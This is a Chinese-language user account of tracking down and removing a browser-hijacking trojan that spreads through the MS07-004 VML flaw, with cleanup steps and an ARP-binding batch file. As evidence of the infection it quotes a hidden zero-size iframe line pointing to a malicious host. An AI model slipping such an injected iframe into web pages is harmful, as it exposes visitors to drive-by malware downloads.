网络安全 频道

新型Hack恶意广告木马绞杀记

    近日,相信很多瑞星用户都比较郁闷,就是一打开浏览器就弹出瑞星的病毒警告提示(见图1 病毒警告提示),不知道使用其他杀毒软件的用户是否有遇到过相同的问题。图1

病毒警告提示

    一、病毒详情:
    除了谷歌(www.google.cn)、雅虎(www.cnyahoo.com)等著名网站外,打开其他的网站时,都弹出如图1那样的病毒提示窗口,经过仔细观察,发现浏览器底部的状态栏中都显示链接到一个相同的网址:http://aaa.369678.cn/win74.html,闪动几次之后,虽然链接到了正确的网址,但却在正确的网址后加了很多参数,有的网页干脆就打不开。查看网页源码,发现这些网页的头部都增加了一行代码“<iframe src="http://aaa.369678.cn/****.htm" width="0" height="0"></iframe>”。

    二、艰苦的查杀过程:
    刚开始时,报着试试看的心理,换一种浏览器试试,先后换了傲游(Maxthon)、火狐(FireFox)、Opera等几种浏览器后,该现象依然如故。接着便将瑞星升级到最新的版本(8月7日),并重新启动到安全模式后,进行全盘扫描,然而依然没有解决问题,看来指望瑞星清除此病毒是没有希望了,从病毒的名称(Hack)上判断,笔者以为这很有可能只是木马,而瑞星对付木马的能力可能比较弱。根据以上的思路,笔者开始使用木马清道夫开始全盘查杀(见图2 木马清道夫)。图2

木马清道夫

    看到木马清道夫发现了6个带木马的病毒文件,虽然对这个结果感到吃惊,但心中不免也有几分庆幸,心想总算清理掉这个可恶的木马了,然而事与愿违,打开浏览器后任意打开一个网页,问题依然如故。难道是木马清道夫的能力不够,无法查杀此病毒?接着笔者有安装了360安全卫士,进行全面查杀(见图3 360安全卫士),这次又找到了两个木马,查杀后问题依旧。图 3

360卫士

     看来根据自己的经验是解决不了这个问题了,只能借助网络了,笔者随即将“Hack.Exploit.Vml.l”作为关键词粘贴到www.baidu.com(百度)里进行了搜索,发现遇到相同问题的网友还真不少,不过大多都是安装使用瑞星杀毒软件的用户。虽然帖子不少,但很多都没有回复,有回复的多半是使用各种工具进行查杀之类的建议,笔者根据这些建议一一测试后,发现也无法根除这个现象。只是对于建议使用“卡巴斯基”进行查杀的建议没有试过,因为自己使用的瑞星毕竟是个正版的,虽然花的银子不多,但好歹还能及时升级。

    三、柳暗花明:
    经过以上的“折腾”,已经耗去了自己半天的时间,真的就不能“搞定”了吗?笔者试着用“http://aaa.369678.cn”作为关键词进行搜索,发现也有很多帖子,终于在众多的帖子中找到了一篇有“价值”的,经过该贴的介绍,发现其实这是一个利用微软 MS07-004(929969)矢量标记语言(VML) 缓冲区溢出漏洞进行传播的恶意程序。由于各杀毒厂商对其命名不同,笔者心中暗想:“难怪使用“Hack.Exploit.Vml.l”作为关键词不能搜索到清除的方法,原来是因为各种杀毒软件对这个漏洞的命名不同造成的”。

    1、各安全公司对此恶意程序的名称如下:
    Rising(瑞星):       Hack.Exploit.Vml.l
    Kaspersky(卡巴斯基):Trojan-Downloader.JS.Agent.lp
    Symantec(诺顿):     Bloodhound.Exploit.117

    2、什么是VML:
    微软的Windows系统中的矢量标记语言 (VML) 实施中存在一个远程执行代码漏洞。 攻击者可能通过构建特制的网页或 HTML 电子邮件来利用该漏洞,当用户访问网页或查看邮件时,该漏洞可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。如果用户使用管理用户权限登录,成功利用此漏洞的攻击者便可完全控制受影响的用户计算机系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建一个新的帐户并拥有完全用户权限。那些使用管理员组(Administrator)帐户登陆系统的用户,受到的影响,要比使用其他组帐户登陆系统的用户,要大很多,因为他们拥有更高的系统操作权限。

    3、感染途径:
    此漏洞通常有两种感染途径:利用MS07-004漏洞给网站挂马和局域网传播。

    网站挂马:当用户访问带有恶意代码的网站时,浏览器会自动运行恶意脚本,下载病毒木马,杀毒软件便会报告病毒。如果用户计算机没有安装MS07-004系统补丁,就会感染病毒。如果用户的电脑已经安装了该补丁,杀毒软件仍然有提示病毒的警告,请清空IE临时文件夹。

    局域网传播:如果你使用的是局域网内的计算机,同时你的电脑已经安装了MS07-004系统补丁,访问网站时,杀毒软件仍然发出发现该病毒的警告。此时应该怀疑局域网中是否感染了ARP病毒,建议网管对全网内计算机进行排查,找出毒源计算机,进行杀毒。

    4、清除方法:
清空IE临时文件夹的方法比较简单,很多用户都会:打开IE浏览器,在菜单中选择“工具”->“Internet选项”,在“常规”选项卡中,点击“删除文件按钮”,当弹出“删除文件”对话框,请勾选“删除所有脱机内容”,并点击“确定”按钮完成删除。对于局域网存在ARP病毒的用户,可以下载ARP防火墙安装(下载地址:http://www.ythaigang.com/download/AntiARP4.2.rar),首先找出中毒的主机(如图4 ARP防火墙),然后对中毒主机进行逐个查杀。图4

ARP防火墙

    5、补充建议:
    一般如果您的局域网里有机器中了ARP病毒,往往网络会变慢,很多客户机上网也会出现时断时续的现象,当您局域网和中毒的主机比较多的情况下,建议您可以建立批处理文件或在网关上配置静态MAC地址的方法将主机的IP与真实的MAC进行绑定,从而保证未中毒主机的正常运行和上网。编写批处理文件xxx.bat内容如下:
    @echo off
    arp -d
    arp -s 192.168.1.1 00-90-0B-09-A7-D7
    将文件中的网关IP地址和MAC地址更改为您实际使用的网关IP地址和MAC地址即可,最后将这个批处理软件拖到“Windows->开始->程序->启动”中。也可以通过在安全网关上绑定用户主机的IP和MAC地址来阻止ARP攻击:在WebUI->高级配置->用户管理中将局域网每台主机均作绑定。

    四、事后体会:
    经过这次对Hack.Exploit.Vml.l的绞杀,使笔者有几点体会。首先,对于自己不能解决解决的问题,可以借助网络的帮助,根据论坛的回复或专家的建议进行排除,但尽量不要完全依赖公司的网管或他人解决,而自己则什么都不过问,那样的话,即使问题最终得到解决,自己还是什么也不会,下次遭遇类似的问题时,依然会束手无策。对于那些有一定的计算机应用基础的朋友来说,最好的方式也许就是在“高手”的指点之下,自己亲手完成。其次,在我们寻找解决方法的时候,经常会使用搜索引擎,而大家都知道,搜索引擎是依靠关键词对网页进行搜索的,因此不同的关键词设置,将直接影响搜索到的结果。通过这次的事件,使笔者对此的理解更加深刻了。最后,不同的杀毒厂商或安全公司,对相同的病毒或木马的命名往往不尽相同,当我们利用搜索引擎时,可以使用病毒的现象作为关键词,相信这样搜索出来的结果会比使用病毒名称搜索的结果更多、更全面。

0
相关文章